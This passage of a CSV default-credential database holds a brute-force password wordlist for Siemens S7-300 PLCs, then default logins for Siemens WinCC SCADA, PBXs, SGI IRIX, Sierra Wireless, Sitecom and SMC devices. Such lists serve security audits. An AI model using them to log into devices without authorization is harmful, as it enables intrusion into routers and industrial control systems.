s7-300,,,,,hhhhhh,,,\nsiemens s7-300,,,,,hhhhhhh,,,\nsiemens s7-300,,,,,hhhhhhhh,,,\nsiemens s7-300,,,,,highspeed,,,\nsiemens s7-300,,,,,hinear,,,\nsiemens s7-300,,,,,home,,,\nsiemens s7-300,,,,,homeplug,,,\nsiemens s7-300,,,,,honda,,,\nsiemens s7-300,,,,,hp.com,,,\nsiemens s7-300,,,,,hpoffice,,,\nsiemens s7-300,,,,,hponly,,,\nsiemens s7-300,,,,,hrloo,,,\nsiemens s7-300,,,,,hsadb,,,\nsiemens s7-300,,,,,http,,,\nsiemens s7-300,,,,,i,,,\nsiemens s7-300,,,,,iDirect,,,\nsiemens s7-300,,,,,ii,,,\nsiemens s7-300,,,,,iii,,,\nsiemens s7-300,,,,,iiii,,,\nsiemens s7-300,,,,,iiiii,,,\nsiemens s7-300,,,,,iiiiii,,,\nsiemens s7-300,,,,,iiiiiii,,,\nsiemens s7-300,,,,,iiiiiiii,,,\nsiemens s7-300,,,,,iloveyou,,,\nsiemens s7-300,,,,,images,,,\nsiemens s7-300,,,,,inads,,,\nsiemens s7-300,,,,,inc,,,\nsiemens s7-300,,,,,indspw,,,\nsiemens s7-300,,,,,inferno,,,\nsiemens s7-300,,,,,initpw,,,\nsiemens s7-300,,,,,inmet,,,\nsiemens s7-300,,,,,internet,,,\nsiemens s7-300,,,,,ironport,,,\nsiemens s7-300,,,,,isee,,,\nsiemens s7-300,,,,,isp,,,\nsiemens s7-300,,,,,j,,,\nsiemens s7-300,,,,,jack,,,\nsiemens s7-300,,,,,janet,,,\nsiemens s7-300,,,,,jannie,,,\nsiemens s7-300,,,,,jasmine,,,\nsiemens s7-300,,,,,jj,,,\nsiemens s7-300,,,,,jjj,,,\nsiemens s7-300,,,,,jjjj,,,\nsiemens s7-300,,,,,jjjjj,,,\nsiemens s7-300,,,,,jjjjjj,,,\nsiemens s7-300,,,,,jjjjjjj,,,\nsiemens s7-300,,,,,jjjjjjjj,,,\nsiemens s7-300,,,,,john,,,\nsiemens s7-300,,,,,joker,,,\nsiemens s7-300,,,,,jordan,,,\nsiemens s7-300,,,,,jordan23,,,\nsiemens s7-300,,,,,k,,,\nsiemens s7-300,,,,,kermit,,,\nsiemens s7-300,,,,,killer,,,\nsiemens s7-300,,,,,killme,,,\nsiemens s7-300,,,,,kilo1987,,,\nsiemens s7-300,,,,,kk,,,\nsiemens s7-300,,,,,kkk,,,\nsiemens s7-300,,,,,kkkk,,,\nsiemens s7-300,,,,,kkkkk,,,\nsiemens s7-300,,,,,kkkkkk,,,\nsiemens s7-300,,,,,kkkkkkk,,,\nsiemens s7-300,,,,,kkkkkkkk,,,\nsiemens s7-300,,,,,korn,,,\nsiemens s7-300,,,,,l,,,\nsiemens s7-300,,,,,lad,,,\nsiemens s7-300,,,,,laflaf,,,\nsiemens s7-300,,,,,letacla,,,\nsiemens s7-300,,,,,letmein,,,\nsiemens s7-300,,,,,level1,,,\nsiemens s7-300,,,,,leviton,,,\nsiemens s7-300,,,,,linga,,,\nsiemens s7-300,,,,,linux,,,\nsiemens s7-300,,,,,lisa,,,\nsiemens s7-300,,,,,ll,,,\nsiemens s7-300,,,,,llatsni,,,\nsiemens s7-300,,,,,lll,,,\nsiemens s7-300,,,,,llll,,,\nsiemens s7-300,,,,,lllll,,,\nsiemens s7-300,,,,,llllll,,,\nsiemens s7-300,,,,,lllllll,,,\nsiemens s7-300,,,,,llllllll,,,\nsiemens s7-300,,,,,locatepw,,,\nsiemens s7-300,,,,,lock,,,\nsiemens s7-300,,,,,login,,,\nsiemens s7-300,,,,,looker,,,\nsiemens s7-300,,,,,lotus,,,\nsiemens s7-300,,,,,love,,,\nsiemens s7-300,,,,,ltd,,,\nsiemens s7-300,,,,,lucky,,,\nsiemens s7-300,,,,,m,,,\nsiemens s7-300,,,,,m1122,,,\nsiemens s7-300,,,,,mail,,,\nsiemens s7-300,,,,,maint,,,\nsiemens s7-300,,,,,maintpw,,,\nsiemens s7-300,,,,,manager,,,\nsiemens s7-300,,,,,maniac,,,\nsiemens s7-300,,,,,master,,,\nsiemens s7-300,,,,,masterkey,,,\nsiemens s7-300,,,,,mediator,,,\nsiemens s7-300,,,,,medion,,,\nsiemens s7-300,,,,,micro,,,\nsiemens s7-300,,,,,microwav,,,\nsiemens s7-300,,,,,miller,,,\nsiemens s7-300,,,,,mis,,,\nsiemens s7-300,,,,,mlusr,,,\nsiemens s7-300,,,,,mm,,,\nsiemens s7-300,,,,,mmm,,,\nsiemens s7-300,,,,,mmmm,,,\nsiemens s7-300,,,,,mmmmm,,,\nsiemens s7-300,,,,,mmmmmm,,,\nsiemens s7-300,,,,,mmmmmmm,,,\nsiemens s7-300,,,,,mmmmmmmm,,,\nsiemens s7-300,,,,,modul,,,\nsiemens s7-300,,,,,module,,,\nsiemens s7-300,,,,,money,,,\nsiemens s7-300,,,,,monitor,,,\nsiemens s7-300,,,,,monkey,,,\nsiemens s7-300,,,,,mosmatic,,,\nsiemens s7-300,,,,,mother,,,\nsiemens s7-300,,,,,motorola,,,\nsiemens s7-300,,,,,mouse,,,\nsiemens s7-300,,,,,mtch,,,\nsiemens s7-300,,,,,mustang,,,\nsiemens s7-300,,,,,mypass,,,\nsiemens s7-300,,,,,mypass123,,,\nsiemens s7-300,,,,,mypc,,,\nsiemens s7-300,,,,,mypc123,,,\nsiemens s7-300,,,,,myspace,,,\nsiemens s7-300,,,,,myspace1,,,\nsiemens s7-300,,,,,n,,,\nsiemens s7-300,,,,,naadmin,,,\nsiemens s7-300,,,,,naranja,,,\nsiemens s7-300,,,,,netadmin,,,\nsiemens s7-300,,,,,netbase,,,\nsiemens s7-300,,,,,netman,,,\nsiemens s7-300,,,,,netopia,,,\nsiemens s7-300,,,,,netscreen,,,\nsiemens s7-300,,,,,netutil,,,\nsiemens s7-300,,,,,network,,,\nsiemens s7-300,,,,,newpass,,,\nsiemens s7-300,,,,,niconex,,,\nsiemens s7-300,,,,,nimdaten,,,\nsiemens s7-300,,,,,nmspw,,,\nsiemens s7-300,,,,,nn,,,\nsiemens s7-300,,,,,nnn,,,\nsiemens s7-300,,,,,nnnn,,,\nsiemens s7-300,,,,,nnnnn,,,\nsiemens s7-300,,,,,nnnnnn,,,\nsiemens s7-300,,,,,nnnnnnn,,,\nsiemens s7-300,,,,,nnnnnnnn,,,\nsiemens s7-300,,,,,nokai,,,\nsiemens s7-300,,,,,notused,,,\nsiemens s7-300,,,,,noway,,,\nsiemens s7-300,,,,,ntacdmax,,,\nsiemens s7-300,,,,,null,,,\nsiemens s7-300,,,,,o,,,\nsiemens s7-300,,,,,oem,,,\nsiemens s7-300,,,,,omron,,,\nsiemens s7-300,,,,,oo,,,\nsiemens s7-300,,,,,ooo,,,\nsiemens s7-300,,,,,oooo,,,\nsiemens s7-300,,,,,ooooo,,,\nsiemens s7-300,,,,,oooooo,,,\nsiemens s7-300,,,,,ooooooo,,,\nsiemens s7-300,,,,,oooooooo,,,\nsiemens s7-300,,,,,op3n,,,\nsiemens s7-300,,,,,operator,,,\nsiemens s7-300,,,,,owner,,,\nsiemens s7-300,,,,,p,,,\nsiemens s7-300,,,,,pas,,,\nsiemens s7-300,,,,,pass,,,\nsiemens s7-300,,,,,passage,,,\nsiemens s7-300,,,,,passw,,,\nsiemens s7-300,,,,,passwd,,,\nsiemens s7-300,,,,,passwo,,,\nsiemens s7-300,,,,,passwor,,,\nsiemens s7-300,,,,,password,,,\nsiemens s7-300,,,,,pat,,,\nsiemens s7-300,,,,,paterna,,,\nsiemens s7-300,,,,,patrick,,,\nsiemens s7-300,,,,,patrol,,,\nsiemens s7-300,,,,,pbxk1064,,,\nsiemens s7-300,,,,,pcs7,,,\nsiemens s7-300,,,,,pentium,,,\nsiemens s7-300,,,,,pento,,,\nsiemens s7-300,,,,,pepper,,,\nsiemens s7-300,,,,,pepsi,,,\nsiemens s7-300,,,,,permit,,,\nsiemens s7-300,,,,,personal,,,\nsiemens s7-300,,,,,pfsense,,,\nsiemens s7-300,,,,,photonix,,,\nsiemens s7-300,,,,,pilou,,,\nsiemens s7-300,,,,,piranha,,,\nsiemens s7-300,,,,,plc,,,\nsiemens s7-300,,,,,plcsim,,,\nsiemens s7-300,,,,,poerty,,,\nsiemens s7-300,,,,,policy,,,\nsiemens s7-300,,,,,power,,,\nsiemens s7-300,,,,,pp,,,\nsiemens s7-300,,,,,ppp,,,\nsiemens s7-300,,,,,pppp,,,\nsiemens s7-300,,,,,ppppp,,,\nsiemens s7-300,,,,,pppppp,,,\nsiemens s7-300,,,,,ppppppp,,,\nsiemens s7-300,,,,,pppppppp,,,\nsiemens s7-300,,,,,princess,,,\nsiemens s7-300,,,,,private,,,\nsiemens s7-300,,,,,proddta,,,\nsiemens s7-300,,,,,profibus,,,\nsiemens s7-300,,,,,protool,,,\nsiemens s7-300,,,,,public,,,\nsiemens s7-300,,,,,pusy,,,\nsiemens s7-300,,,,,pw123,,,\nsiemens s7-300,,,,,pwd,,,\nsiemens s7-300,,,,,q,,,\nsiemens s7-300,,,,,qawsed,,,\nsiemens s7-300,,,,,qq,,,\nsiemens s7-300,,,,,qq520,,,\nsiemens s7-300,,,,,qqq,,,\nsiemens s7-300,,,,,qqqq,,,\nsiemens s7-300,,,,,qqqqq,,,\nsiemens s7-300,,,,,qqqqqq,,,\nsiemens s7-300,,,,,qqqqqqq,,,\nsiemens s7-300,,,,,qqqqqqqq,,,\nsiemens s7-300,,,,,qwe,,,\nsiemens s7-300,,,,,qwer,,,\nsiemens s7-300,,,,,qwerty,,,\nsiemens s7-300,,,,,qwerty1,,,\nsiemens s7-300,,,,,qwertyu,,,\nsiemens s7-300,,,,,qwertyui,,,\nsiemens s7-300,,,,,r,,,\nsiemens s7-300,,,,,r@p8p0r+,,,\nsiemens s7-300,,,,,rade0n,,,\nsiemens s7-300,,,,,radius,,,\nsiemens s7-300,,,,,radware,,,\nsiemens s7-300,,,,,rdfhnbhf,,,\nsiemens s7-300,,,,,recovery,,,\nsiemens s7-300,,,,,rego,,,\nsiemens s7-300,,,,,remote,,,\nsiemens s7-300,,,,,rip000,,,\nsiemens s7-300,,,,,rittal,,,\nsiemens s7-300,,,,,robele,,,\nsiemens s7-300,,,,,root,,,\nsiemens s7-300,,,,,router,,,\nsiemens s7-300,,,,,rr,,,\nsiemens s7-300,,,,,rrr,,,\nsiemens s7-300,,,,,rrrr,,,\nsiemens s7-300,,,,,rrrrr,,,\nsiemens s7-300,,,,,rrrrrr,,,\nsiemens s7-300,,,,,rrrrrrr,,,\nsiemens s7-300,,,,,rrrrrrrr,,,\nsiemens s7-300,,,,,rs4igoy,,,\nsiemens s7-300,,,,,rtyhn,,,\nsiemens s7-300,,,,,run-p,,,\nsiemens s7-300,,,,,russia,,,\nsiemens s7-300,,,,,rwmaint,,,\nsiemens s7-300,,,,,s,,,\nsiemens s7-300,,,,,s7,,,\nsiemens s7-300,,,,,s7-300,,,\nsiemens s7-300,,,,,s7-400,,,\nsiemens s7-300,,,,,scout,,,\nsiemens s7-300,,,,,search,,,\nsiemens s7-300,,,,,secret,,,\nsiemens s7-300,,,,,secure,,,\nsiemens s7-300,,,,,security,,,\nsiemens s7-300,,,,,sekret,,,\nsiemens s7-300,,,,,serco,,,\nsiemens s7-300,,,,,serial#,,,\nsiemens s7-300,,,,,serovox,,,\nsiemens s7-300,,,,,server,,,\nsiemens s7-300,,,,,setherco,,,\nsiemens s7-300,,,,,setup,,,\nsiemens s7-300,,,,,sex,,,\nsiemens s7-300,,,,,sgena,,,\nsiemens s7-300,,,,,sgilent,,,\nsiemens s7-300,,,,,shadow,,,\nsiemens s7-300,,,,,sicostart,,,\nsiemens s7-300,,,,,siemens,,,\nsiemens s7-300,,,,,simatic,,,\nsiemens s7-300,,,,,simens,,,\nsiemens s7-300,,,,,simo,,,\nsiemens s7-300,,,,,simocode,,,\nsiemens s7-300,,,,,simoreg,,,\nsiemens s7-300,,,,,simovert,,,\nsiemens s7-300,,,,,simtec,,,\nsiemens s7-300,,,,,sirborn,,,\nsiemens s7-300,,,,,sitop,,,\nsiemens s7-300,,,,,slave,,,\nsiemens s7-300,,,,,slipknot,,,\nsiemens s7-300,,,,,smile,,,\nsiemens s7-300,,,,,smuser,,,\nsiemens s7-300,,,,,snoopy,,,\nsiemens s7-300,,,,,soccer,,,\nsiemens s7-300,,,,,solution,,,\nsiemens s7-300,,,,,ss,,,\nsiemens s7-300,,,,,sss,,,\nsiemens s7-300,,,,,ssss,,,\nsiemens s7-300,,,,,sssss,,,\nsiemens s7-300,,,,,ssssss,,,\nsiemens s7-300,,,,,sssssss,,,\nsiemens s7-300,,,,,ssssssss,,,\nsiemens s7-300,,,,,stan,,,\nsiemens s7-300,,,,,star,,,\nsiemens s7-300,,,,,starwar,,,\nsiemens s7-300,,,,,step5,,,\nsiemens s7-300,,,,,step7,,,\nsiemens s7-300,,,,,stimpy,,,\nsiemens s7-300,,,,,stl,,,\nsiemens s7-300,,,,,stop,,,\nsiemens s7-300,,,,,ststic,,,\nsiemens s7-300,,,,,summer,,,\nsiemens s7-300,,,,,sunrise,,,\nsiemens s7-300,,,,,superid,,,\nsiemens s7-300,,,,,superman,,,\nsiemens s7-300,,,,,support,,,\nsiemens s7-300,,,,,surt,,,\nsiemens s7-300,,,,,switch,,,\nsiemens s7-300,,,,,sybase,,,\nsiemens s7-300,,,,,synnet,,,\nsiemens s7-300,,,,,sysadm,,,\nsiemens s7-300,,,,,sysdisk,,,\nsiemens s7-300,,,,,system,,,\nsiemens s7-300,,,,,t,,,\nsiemens s7-300,,,,,talent,,,\nsiemens s7-300,,,,,talisman,,,\nsiemens s7-300,,,,,tech,,,\nsiemens s7-300,,,,,telco,,,\nsiemens s7-300,,,,,telecom,,,\nsiemens s7-300,,,,,telesup,,,\nsiemens s7-300,,,,,tellabs#1,,,\nsiemens s7-300,,,,,telus,,,\nsiemens s7-300,,,,,temp,,,\nsiemens s7-300,,,,,temp123,,,\nsiemens s7-300,,,,,test,,,\nsiemens s7-300,,,,,test123,,,\nsiemens s7-300,,,,,thomas,,,\nsiemens s7-300,,,,,tiaranet,,,\nsiemens s7-300,,,,,tiger123,,,\nsiemens s7-300,,,,,timely,,,\nsiemens s7-300,,,,,tini,,,\nsiemens s7-300,,,,,tivonpw,,,\nsiemens s7-300,,,,,tjm,,,\nsiemens s7-300,,,,,tlah,,,\nsiemens s7-300,,,,,toolset,,,\nsiemens s7-300,,,,,trancell,,,\nsiemens s7-300,,,,,tratata,,,\nsiemens s7-300,,,,,tslinux,,,\nsiemens s7-300,,,,,tt,,,\nsiemens s7-300,,,,,ttt,,,\nsiemens s7-300,,,,,tttt,,,\nsiemens s7-300,,,,,ttttt,,,\nsiemens s7-300,,,,,tttttt,,,\nsiemens s7-300,,,,,ttttttt,,,\nsiemens s7-300,,,,,tttttttt,,,\nsiemens s7-300,,,,,tuborg,,,\nsiemens s7-300,,,,,tuxalize,,,\nsiemens s7-300,,,,,tx100,,,\nsiemens s7-300,,,,,u,,,\nsiemens s7-300,,,,,uplink,,,\nsiemens s7-300,,,,,user,,,\nsiemens s7-300,,,,,uu,,,\nsiemens s7-300,,,,,uuu,,,\nsiemens s7-300,,,,,uuuu,,,\nsiemens s7-300,,,,,uuuuu,,,\nsiemens s7-300,,,,,uuuuuu,,,\nsiemens s7-300,,,,,uuuuuuu,,,\nsiemens s7-300,,,,,uuuuuuuu,,,\nsiemens s7-300,,,,,v,,,\nsiemens s7-300,,,,,vesoft,,,\nsiemens s7-300,,,,,visual,,,\nsiemens s7-300,,,,,vjqgfhjkm,,,\nsiemens s7-300,,,,,vodka,,,\nsiemens s7-300,,,,,volition,,,\nsiemens s7-300,,,,,vv,,,\nsiemens s7-300,,,,,vvv,,,\nsiemens s7-300,,,,,vvvv,,,\nsiemens s7-300,,,,,vvvvv,,,\nsiemens s7-300,,,,,vvvvvv,,,\nsiemens s7-300,,,,,vvvvvvv,,,\nsiemens s7-300,,,,,vvvvvvvv,,,\nsiemens s7-300,,,,,w,,,\nsiemens s7-300,,,,,webadmin,,,\nsiemens s7-300,,,,,win,,,\nsiemens s7-300,,,,,wincc,,,\nsiemens s7-300,,,,,winterm,,,\nsiemens s7-300,,,,,wizard,,,\nsiemens s7-300,,,,,wlsedb,,,\nsiemens s7-300,,,,,wolf,,,\nsiemens s7-300,,,,,ww,,,\nsiemens s7-300,,,,,www,,,\nsiemens s7-300,,,,,wwww,,,\nsiemens s7-300,,,,,wwwww,,,\nsiemens s7-300,,,,,wwwwww,,,\nsiemens s7-300,,,,,wwwwwww,,,\nsiemens s7-300,,,,,wwwwwwww,,,\nsiemens s7-300,,,,,wyse,,,\nsiemens s7-300,,,,,x,,,\nsiemens s7-300,,,,,x-admin,,,\nsiemens s7-300,,,,,x40rocks,,,\nsiemens s7-300,,,,,xbox,,,\nsiemens s7-300,,,,,xlserver,,,\nsiemens s7-300,,,,,xx,,,\nsiemens s7-300,,,,,xxx,,,\nsiemens s7-300,,,,,xxxx,,,\nsiemens s7-300,,,,,xxxxx,,,\nsiemens s7-300,,,,,xxxxxx,,,\nsiemens s7-300,,,,,xxxxxxx,,,\nsiemens s7-300,,,,,xxxxxxxx,,,\nsiemens s7-300,,,,,xxyyzz,,,\nsiemens s7-300,,,,,y,,,\nsiemens s7-300,,,,,yxcv,,,\nsiemens s7-300,,,,,yy,,,\nsiemens s7-300,,,,,yyy,,,\nsiemens s7-300,,,,,yyyy,,,\nsiemens s7-300,,,,,yyyyy,,,\nsiemens s7-300,,,,,yyyyyy,,,\nsiemens s7-300,,,,,yyyyyyy,,,\nsiemens s7-300,,,,,yyyyyyyy,,,\nsiemens s7-300,,,,,z,,,\nsiemens s7-300,,,,,z0ne,,,\nsiemens s7-300,,,,,zettler,,,\nsiemens s7-300,,,,,zippo,,,\nsiemens s7-300,,,,,zone,,,\nsiemens s7-300,,,,,zoomadsl,,,\nsiemens s7-300,,,,,zorro,,,\nsiemens s7-300,,,,,zorromen,,,\nsiemens s7-300,,,,,zxc,,,\nsiemens s7-300,,,,,zxcv,,,\nsiemens s7-300,,,,,zxcvb,,,\nsiemens s7-300,,,,,zxcvbn,,,\nsiemens s7-300,,,,,zxcvbnm,,,\nsiemens s7-300,,,,,zxcvbnm,,,,\nsiemens s7-300,,,,,zz,,,\nsiemens s7-300,,,,,zzz,,,\nsiemens s7-300,,,,,zzzz,,,\nsiemens s7-300,,,,,zzzzz,,,\nsiemens s7-300,,,,,zzzzzz,,,\nsiemens s7-300,,,,,zzzzzzz,,,\nsiemens s7-300,,,,,zzzzzzzz,,,\nsiemens,5940 T1E1 Router,5940-001 v6.0.180-2,Telnet,superuser,admin,Admin,,\nsiemens,APACS,,ACM Controller,,gubed,,,\nsiemens,Gigaset A580IP,,,,0000,Admin,,\nsiemens,Gigaset C470IP,,,,0000,Admin,,\nsiemens,Gigaset C475IP,,192.168,2,2,,Admin,\nsiemens,Gigaset S685IP,,,,0000,Admin,,\nsiemens,Gigaset SX541 WLAN dsl,,http://192.168.2.1,,admin,Admin,,\nsiemens,Gigaset SX762,,,,admin,,,\nsiemens,HIPATH 3800,V9,DIRECT,31994,31994,31994,,\nsiemens,HiPath 3000,,,31994,31994,,,\nsiemens,HiPath 3000,,Manager,office,office,,,\nsiemens,HiPath 3000,,Multi,31994,31994,,,\nsiemens,Hipath,,Multi,,,Admin,,\nsiemens,OpenStage SIP Webinterface,,,,123456,,,\nsiemens,Optipoint,,,,123456,,,\nsiemens,Optipoint,,Multi,,123456,,,\nsiemens,PC BIOS,,,,SKY_FOX,CMOS,,\nsiemens,PhoneMail,,,poll,tech,,,\nsiemens,PhoneMail,,,sysadmin,sysadmin,,,\nsiemens,PhoneMail,,,tech,tech,,,\nsiemens,Phonemail,,,tech,field,,,\nsiemens,Phonemail,,Multi,tech,field,,,\nsiemens,QUADLOG,,CCM Controller,,gubed,,,\nsiemens,ROLM PBX,,,admin,pwp,,,\nsiemens,ROLM PBX,,,eng,engineer,,,\nsiemens,ROLM PBX,,,op,op,,,\nsiemens,ROLM PBX,,,op,operator,,,\nsiemens,ROLM PBX,,,su,super,,,\nsiemens,S7,,,basisk,basisk,,,\nsiemens,SE515,,,admin,,,,\nsiemens,SE515,,HTTP,admin,,,,\nsiemens,Siemens Nixdorf 8818 PBX,,,,uboot,,,\nsiemens,Siemens Nixdorf Hicom 100E PBX,,,31994,31994,,,\nsiemens,Siemens Nixdorf Hicom 150E PBX,,,31994,31994,,,\nsiemens,Siemens Nixdorf PC BIOS,,Console,,SKY_FOX,Admin,,\nsiemens,Siemens Pro C5,,Multi,,,Admin,,\nsiemens,Simatic WinCC SCADA,,,WinCCAdmin,2WSXcder,,,\nsiemens,Simatic WinCC SCADA,,,WinCCConnect,2WSXcder,,,\nsiemens,SpeedStream 4100,,HTTP,admin,hagpolm1,Admin,DSL Modem and Router,\nsiemens,SpeedStream 4200,Bigpond,10.0.0.138,admin,admin,Admin,,\nsiemens,SpeedStream 4200,Generic,192.168.254.254,admin,,Admin,,\nsiemens,SpeedStream 4200,OptusNet,10.1.1.1,admin,,Admin,,\nsiemens,SpeedStream 5100,,192.168.254,254,admin,admin,2012-01-10,\nsiemens,SpeedStream 5200,,192.168.254,254,admin,admin,2012-01-10,\nsiemens,SpeedStream 5450,,192.168.254,254,admin,,2012-01-10,\nsiemens,SpeedStream 6520,,192.168.254,254 or 10.0.0.138,admin,admin,2012-01-10,\nsiemens,WinCC,,,WinCCAdmin,2WSXcde.,,,\nsiemens,WinCC,,,WinCCConnect,2WSXcder,,,\nsiemens,hipath,,,,,,,\nsiemens,hipath,,Admin,,,,,\nsiemens,hipath,,Multi,,,Admin,,\nsiemensnixdorf,8818 PBX,,,,uboot,,,\nsiemensnixdorf,Hicom 100E PBX,,,31994,31994,,,\nsiemensnixdorf,Hicom 150E PBX,,,31994,31994,,,\nsiemensnixdorf,PC BIOS,,Console,,SKY_FOX,Admin,,\nsierrawireless,ACEmanager,,,user,12345,,,\nsierrawireless,AirCard 753S,,10.0.0.138,admin,admin,Admin,,\nsierrawireless,AirCard 760S,Bigpond,10.0.0.138,admin,admin,Admin,also http://bigpond.4g,\nsierrawireless,AirCard 760S,Telstra,192.168.1.1,admin,admin,Admin,also http://telstra.4g,\nsierrawireless,AirLink Helix,,192.168.2.1,admin,12345,Admin,,\nsierrawireless,BigPond Ultimate Mobile Broadband Wi-Fi,,,,admin,Admin,,\nsierrawireless,GX400,,192.168.13.31 or 192.168.14.31,user,12345,AceManager,,\nsierrawireless,GX440,,192.168.13.31 or 192.168.14.31,user,12345,AceManager,,\nsierrawireless,Telstra Ultimate Mobile Broadband Wi-Fi,,,,Admin_Ultimate,Admin,,\nsierrawireless,W801,Time Warner / Roadrunner,http://twc4gmobile,,password,Admin,,\nsigma,Sigmacoma IPshare,Sigmacom router v1.0,HTTP,admin,admin,Admin,,\nsigmatel,s3+,s3+,,,1221,,can be change but try it,\nsigmatel,s3+,s3+,,,1221,,can be change,\nsiips,Trojan,,8974202,Administrator,ganteng,,,\nsiips,Trojan,,Admin,Administrator,ganteng,,,\nsiips,Trojan,8974202,Multi,Administrator,ganteng,Admin,,\nsiips,Trojan,8974202,Multi,Administrator,ganteng,Admin,Thx,\nsilextechnology,PRICOM (Printserver),,Multi,root,,Admin,for telnet / HTTP,\nsilextechnology,USB Device Server,,,root,(non),,,\nsilicon graphics,IRIX,,,4Dgifts,,,,\nsilicon graphics,IRIX,,,6.x,,,,\nsilicon graphics,IRIX,,,Ezsetup,,,,\nsilicon graphics,IRIX,,,OutOfBox,,,,\nsilicon graphics,IRIX,,,demos,,,,\nsilicon graphics,IRIX,,,field,field,,,\nsilicon graphics,IRIX,,,tour,tour,,,\nsilicon graphics,IRIX,,,tutor,,,,\nsilicon graphics,IRIX,,5.x 6.x,guest,,,,\nsilicon graphics,IRIX,,5.x 6.x,lp,,,,\nsilicon graphics,IRIX,,Admin,4Dgifts,,,,\nsilicon graphics,IRIX,,Admin,4Dgifts,4Dgifts,,,\nsilicon graphics,IRIX,,Admin,Ezsetup,,,,\nsilicon graphics,IRIX,,Admin,OutOfBox,,,,\nsilicon graphics,IRIX,,Admin,demos,,,,\nsilicon graphics,IRIX,,Admin,field,field,,,\nsilicon graphics,IRIX,,Admin,tour,tour,,,\nsilicon graphics,IRIX,,Admin,tutor,,,,\nsilicon graphics,IRIX,,Admin,tutor,tutor,,,\nsilicon graphics,IRIX,,CLI,guest,,,,\nsilicon graphics,IRIX,,CLI,lp,,,,\nsilicongraphics,IRIX,,Multi,4Dgifts,,Admin,,\nsilicongraphics,IRIX,,Multi,4Dgifts,4Dgifts,Admin,,\nsilicongraphics,IRIX,,Multi,Ezsetup,,Admin,,\nsilicongraphics,IRIX,,Multi,OutOfBox,,Admin,,\nsilicongraphics,IRIX,,Multi,demos,,Admin,,\nsilicongraphics,IRIX,,Multi,field,field,Admin,,\nsilicongraphics,IRIX,,Multi,tour,tour,Admin,,\nsilicongraphics,IRIX,,Multi,tutor,,Admin,,\nsilicongraphics,IRIX,,Multi,tutor,tutor,Admin,,\nsilicongraphics,IRIX,5.x 6.x,Multi,guest,,CLI; UID guest,,\nsilicongraphics,IRIX,5.x 6.x,Multi,lp,,CLI; UID lp,,\nsipura,SPA-3000,,prot:,admin,admin,Administration,,\nsitara,qosworks,,Console,root,,Admin,,\nsite interactive,Auction Weaver Lite,,,admin,pass,,,\nsitecom,All WiFi routers,,Multi,,sitecom,Admin,,\nsitecom,DC-207,,,admin,admin,Admin,,\nsitecom,WL-108,,,admin,password,Admin,,\nsitecom,WL-109,,,admin,password,Admin,,\nsitecom,WL-114v2,,,admin,admin,Admin,,\nsitecom,WL-122,,,,sitecom,Admin,,\nsitecom,WL-607,,http://192.168.0.1,admin,admin,,,\nsitecom,WR-1133,,,,damin,Admin,,\nsitecom,wl-108,,192.168.0.1,,,,,\nsitecorecorporation,Sitecore CMS,,,Audrey,a,,,\nsitecorecorporation,Sitecore CMS,,,Bill,b,,,\nsitecorecorporation,Sitecore CMS,,,Denny,d,,,\nsitecorecorporation,Sitecore CMS,,,Lonnie,l,,,\nsitecorecorporation,Sitecore CMS,,,Minnie,m,,,\nsitecorecorporation,Sitecore CMS,,,admin,b,,,\nsiteinteractive,Auction Weaver Lite,,,admin,pass,Admin,,\nsky,SR101,3.45.1133.R,192.168.0.1,admin,sky,Access to sky broadband router settings,,\nsmaamerica,Sunny Webbox,,,,sma,,,\nsmartbridges,airBridge,,admin,admin,public,,,\nsmartbridges,airBridge,2.x,Multi,admin,public,admin,,\nsmartswitch,Router 250 ssr2500,,Admin,admin,,,,\nsmartswitch,Router 250 ssr2500,,v3.0.9,admin,,,,\nsmartswitch,Router 250 ssr2500,v3.0.9,Multi,admin,,Admin,,\nsmc,2804WR,,HTTP,,smcadmin,Admin,,\nsmc,2804wbr,,,admin,admin,,,\nsmc,7004FW,,Admin,,,,,\nsmc,7004FW,,HTTP,,,Admin,,\nsmc,7004VBR,V.2,http://192.168.2.1.,,smcadmin,Admin,192.168.2.1.,\nsmc,7204BRA,,HTTP,smc,smcadmin,web,,\nsmc,7204BRA,,Multi,smc,smcadmin,Admin,,\nsmc,7204bra,,web,smc,smcadmin,,,\nsmc,7401BRA,1,HTTP,admin,barricade,Admin,,\nsmc,7401BRA,2,HTTP,smc,smcadmin,Admin,,\nsmc,7901W/BRA,,,admin,smcadmin,,,\nsmc,7901W/BRA,,HTTP,admin,smcadmin,,,\nsmc,7901W/BRA,,Multi,admin,smcadmin,,,\nsmc,8014,Comcast,,cusadmin,highspeed,Admin,,\nsmc,8014WG,,192.168.0.1,mso,suddenlink,top admin,for suddenlink router,\nsmc,Barricade 7004 AWBR,,,admin,,,,\nsmc,Barricade 7004 AWBR,,Admin,admin,,,,\nsmc,Barricade 7004ABR,,,,0,Admin,,\nsmc,Barricade 7004ABR,,,,0000,Admin,,\nsmc,Barricade 7004AWBR,,Multi,admin,,Admin,192.168.123.254 (WiFi AP),\nsmc,Barricade 7004VBR,V.2,,,smcadmin,Admin,,\nsmc,Barricade 7004VWBR,,Multi,,,Admin,Connect to 192.168.2.1 or 192.168.2.1:88,\nsmc,Barricade 7204BRB,,HTTP,admin,smcadmin,Admin,,\nsmc,Barricade Router,,,Admin,Barricade,,,\nsmc,Barricade Router,,7004ABR,,0000,,,\nsmc,Barricade Routers,,,Admin,Barricade,Admin,,\nsmc,Comcast Business Gateway,,,cusadmin,highspeed,,,\nsmc,Many models,,,admin,smcadmin,,,\nsmc,Modem/Router,,HTTP,cusadmin,highspeed,Customer Admin,Comcast Commercial High Speed Modem model number 8013WG,\nsmc,Modem/Wireless Router,,http://192.168.0.1,cusadmin,password,root,,\nsmc,Router,,Admin,admin,admin,,,\nsmc,Router,,All,admin,admin,,,\nsmc,Router,All,HTTP,admin,admin,Admin,,\nsmc,Router/Modem,BR7401,Multi,admin,barricade,Admin,,\nsmc,SMB2804WBR,V2,Multi,Administrator,smcadmin,Admin,,\nsmc,SMC broadband router,,HTTP,admin,admin,Admin,,\nsmc,SMC2304 Router,,,,smcadmin,,,\nsmc,SMC2304WBR-AG,,http://192.168.2.1,,smcadmin,Administration,,\nsmc,SMC2404 Router,,,,smcadmin,,,\nsmc,SMC2552W-G,,192.168.2.2,admin,smcadmin,,,\nsmc,SMC2652W,,,,WLAN_AP,,,\nsmc,SMC2652W,,,default,WLAN_AP,Admin,,\nsmc,SMC2655W,,192.168.0.254,,MiniAP,,,\nsmc,SMC2755W,,192.168.1.20,Admin,5up,,,\nsmc,SMC2804 